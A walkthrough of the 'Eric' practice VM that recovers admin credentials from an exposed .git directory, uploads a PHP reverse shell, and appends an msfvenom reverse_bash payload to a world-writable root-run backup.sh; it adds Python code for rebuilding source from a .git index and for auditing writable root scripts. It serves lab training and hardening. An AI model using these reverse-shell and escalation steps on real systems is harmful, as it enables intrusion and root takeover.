Eric target machine penetration test

First, setup notes

* Environment: attack machine Kali Linux; target machine Eric, running in VirtualBox

* Network: both VMs on the same host-only network

* Flag locations: /root/flag.txt and /home/eric/flag.txt (the author gives these exact locations on the download page, so they are known in advance)

Second, procedure

1. Information gathering

First check Kali's own address: run ifconfig in a terminal. Kali is 192.168.56.102.

Because the target and Kali sit on the same host-only network, use nmap to scan that network segment for the target's IP and its open ports.

The target is 192.168.56.103, with ports 80 and 22 open. Open port 80 in a browser.

The page only says "Blog under construction"; viewing the source with F12 turns up nothing.

Next, brute-force paths with DirBuster, which discovers hidden directories and files on the web server.

It finds .git, admin.php, index.php and a few other files. Open admin.php.

It is a login page, but the username and password are unknown, and a quick weak-password brute force does not work.

Looking at how others approached it, I noticed the .git directory had not been used yet. The .git folder is created by git init (or by git clone) inside the project directory: it is the repository itself and holds everything git needs to operate, including the index, which lists every tracked file, and the object database, which stores the content of every committed version. If the web server serves this folder, the site's source can be rebuilt from it, even though the PHP files themselves are only ever executed by the server, never shown.

The tool used here is GitHack, a script for exploiting a .git leak: it downloads the leaked files and reconstructs the source code from them.

Download it from https://github.com/lijiejie/GitHack; it runs directly under Python. Run it against the target's .git directory.

The results are saved in a folder; it contains two files, admin.php and index.php.

Open admin.php.
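The following is an added example, not GitHack's own code and not part of this writeup. It performs the same reconstruction GitHack does: read .git/index for every tracked path and its blob SHA-1, then fetch and inflate each loose object under objects/xx/yyyy. Because the real leak is fetched over HTTP, the .git directory here is constructed in a temporary directory with invented PHP files and invented credentials; to use it against a target, fetch_object would replace the local file read with a GET of http://<target>/.git/objects/xx/yyyy (that URL pattern and the sample files are assumptions for the demo). It handles loose objects only, verifies the index checksum and every object's hash so truncated downloads are noticed, and refuses index entries that would write outside the output directory.

```python
from __future__ import annotations
import hashlib, pathlib, struct, tempfile, zlib


def hash_object(kind: str, body: bytes) -> tuple[str, bytes]:
    """(sha1 hex, zlib loose object) exactly as git stores it."""
    raw = b"%s %d\0" % (kind.encode(), len(body)) + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_index(entries: list[tuple[str, str, int]]) -> bytes:
    """Serialise a v2 .git/index: 10 uint32 stat fields, 20-byte SHA-1, 16-bit flags
    (low 12 bits = name length), NUL-terminated path, NUL padding to 8 bytes."""
    body = b"DIRC" + struct.pack(">II", 2, len(entries))
    for path, sha_hex, size in sorted(entries):   # git keeps the index sorted by path
        rec = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, size)  # stat fields zeroed
        rec += bytes.fromhex(sha_hex) + struct.pack(">H", min(len(path), 0xFFF))
        rec += path.encode() + b"\0"
        rec += b"\0" * (-len(rec) % 8)
        body += rec
    return body + hashlib.sha1(body).digest()  # trailing checksum


def parse_index(data: bytes) -> list[tuple[str, str]]:
    """Parse .git/index (v2/v3) into [(path, sha1 hex)]: the file list GitHack walks."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated download?)")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    entries, off = [], 12
    for _ in range(count):
        start = off
        sha_hex = data[off + 40:off + 60].hex()        # SHA-1 follows the 40 stat bytes
        (flags,) = struct.unpack(">H", data[off + 60:off + 62])
        off += 62
        if version == 3 and flags & 0x4000:            # extended-flags word present
            off += 2
        end = data.index(b"\0", off)
        entries.append((data[off:end].decode(), sha_hex))
        off = end + 1
        off += -(off - start) % 8                      # skip NUL padding to 8-byte boundary
    return entries


def fetch_object(git_dir: pathlib.Path, sha_hex: str) -> tuple[str, bytes]:
    """Inflate one loose object and verify it; packfiles are not handled (a GitHack gap too)."""
    raw = zlib.decompress((git_dir / "objects" / sha_hex[:2] / sha_hex[2:]).read_bytes())
    if hashlib.sha1(raw).hexdigest() != sha_hex:
        raise ValueError(f"object {sha_hex} is corrupt")
    header, _, body = raw.partition(b"\0")             # "blob <len>\0<content>"
    kind, size = header.split()
    if int(size) != len(body):
        raise ValueError(f"object {sha_hex} has a bad length")
    return kind.decode(), body


def restore_source(git_dir: pathlib.Path, out_dir: pathlib.Path) -> dict[str, bytes]:
    """Write every blob named in the index below out_dir; return {path: content}."""
    restored = {}
    for path, sha_hex in parse_index((git_dir / "index").read_bytes()):
        parts = pathlib.PurePosixPath(path).parts
        if path.startswith("/") or ".." in parts:      # hostile index: refuse traversal
            continue
        kind, body = fetch_object(git_dir, sha_hex)
        if kind != "blob":
            continue
        dest = out_dir.joinpath(*parts)
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_bytes(body)
        restored[path] = body
    return restored


# Constructed sample site; the credentials are invented, not the Eric VM's.
SAMPLE_FILES = {
    "index.php": b"<?php echo 'Blog under construction'; ?>\n",
    "admin.php": b"<?php $username = 'admin'; $password = 'SampleOnly#1'; ?>\n",
    "../evil.php": b"<?php ?>\n",                       # traversal entry, must be skipped
}


def write_leaky_git(root: pathlib.Path) -> pathlib.Path:
    """Lay out a minimal .git (index + loose blobs) for SAMPLE_FILES."""
    git_dir, entries = root / ".git", []
    for path, body in SAMPLE_FILES.items():
        sha_hex, comp = hash_object("blob", body)
        obj = git_dir / "objects" / sha_hex[:2] / sha_hex[2:]
        obj.parent.mkdir(parents=True, exist_ok=True)
        obj.write_bytes(comp)
        entries.append((path, sha_hex, len(body)))
    (git_dir / "index").write_bytes(build_index(entries))
    return git_dir


def demo() -> dict[str, bytes]:
    """Build the leaky .git, then rebuild the PHP files from it alone."""
    with tempfile.TemporaryDirectory() as tmp:
        git_dir = write_leaky_git(pathlib.Path(tmp) / "site")
        return restore_source(git_dir, pathlib.Path(tmp) / "recovered")


if __name__ == "__main__":
    for name, content in demo().items():
        print(f"== {name} ==\n{content.decode()}")
```

Running it prints the two recovered PHP files, admin.php with its credentials included, while the "../evil.php" entry is skipped. The same index walk is why a leaked .git is worse than a leaked backup of the web root: the object database also keeps the content of earlier commits, so credentials that were later removed from admin.php are still recoverable from the older blobs.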

2. File upload, reverse shell

admin.php contains the username and password. Use them to log in.

The admin page allows file uploads, so upload php-reverse-shell.php with its ip changed to Kali's IP and its port changed to the port to listen on.

Then start a listener on port 6666 in Kali and open the uploaded shell in the browser.

Running su fails with "must be run from a terminal", so, following other writeups, spawn a pty: python3 -c 'import pty;pty.spawn("/bin/bash")'

Now go looking for the flag.

That gives the first flag.

I then tried to enter /root, but permissions were insufficient.

3. Privilege escalation

Looking at the other files in eric's home directory, backup.sh has full permissions (readable, writable and executable by everyone) and runs as root.

I was not sure how to proceed, so I followed existing writeups. First generate a payload locally in Kali: msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=4455 R

Write the generated payload into backup.sh.

Start another listener, on port 4455, and run backup.sh.

But for some reason I still could not get into /root, so the second flag was not found, and that was the end of this box.
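As an added example, not from this writeup or the referenced ones, here is the check that turns "backup.sh has full permissions and runs as root" into a finding. Given a script that root is known to execute and the uid of the low-privileged user, it reports every way that user could get code into it: the file's own permission bits (the Eric case), ownership by the user, and a writable non-sticky directory that lets the file be renamed away and replaced, which a look at the file's mode alone does not show. The temporary directory, the 0777 and 0755 modes and the attacker uid are constructed for the demo; the code does not discover cron jobs or other root triggers, it audits a script you already know root runs.

```python
from __future__ import annotations
import os
import pathlib
import stat
import tempfile


def writable_by(st: os.stat_result, uid: int, groups: frozenset[int]) -> bool:
    """True if a process running as uid/groups could write the object described by st."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in groups:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_root_script(path: str, attacker_uid: int,
                      attacker_groups: frozenset[int] = frozenset()) -> list[str]:
    """Findings describing how attacker_uid could get code into a script that root runs.
    An empty list means the file and its directory deny that user any write path."""
    p = pathlib.Path(path)
    st, dst = p.stat(), p.parent.stat()
    findings = []
    if writable_by(st, attacker_uid, attacker_groups):
        findings.append(f"{p}: writable by uid {attacker_uid} ({stat.filemode(st.st_mode)})")
    if st.st_uid == attacker_uid:  # the owner can chmod it back even if it is read-only now
        findings.append(f"{p}: owned by uid {attacker_uid}, not by root")
    # A writable, non-sticky directory lets the file be renamed away and replaced.
    if writable_by(dst, attacker_uid, attacker_groups) and not dst.st_mode & stat.S_ISVTX:
        findings.append(f"{p.parent}: directory writable, {p.name} can be replaced")
    return findings


def demo() -> dict[str, list[str]]:
    """Constructed scenario: backup.sh at mode 0777 (as on Eric) next to a 0755 copy."""
    me = os.getuid()
    attacker = 65534 if me != 65534 else 65533   # any uid other than the file owner
    with tempfile.TemporaryDirectory() as tmp:   # mkdtemp creates the directory as 0700
        home = pathlib.Path(tmp)
        weak, fixed = home / "backup.sh", home / "backup_fixed.sh"
        for f in (weak, fixed):
            f.write_text("#!/bin/bash\ntar czf /root/backup.tgz /var/www\n")  # invented body
        os.chmod(weak, 0o777)
        os.chmod(fixed, 0o755)
        return {"vulnerable": audit_root_script(str(weak), attacker),
                "hardened": audit_root_script(str(fixed), attacker)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or ["no write path"])
```

Two caveats when acting on a finding like this. A world-writable script only yields root when a root process actually executes it (a cron entry, a root login hook, a service); running backup.sh from eric's own shell executes whatever was appended to it as eric, so the listener has to wait for root's trigger. And the fix is the mode change the hardened case shows (root-owned, 0755 or tighter), plus a directory root controls, since a writable directory undoes a read-only file.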

 

References:

https://ainiya.xyz/2019/12/07/2019-eric-shen-tou-ce-shi-zong-jie/

https://cloud.tencent.com/developer/article/1543832

Source: www.cnblogs.com/niceblogs/p/12019843.html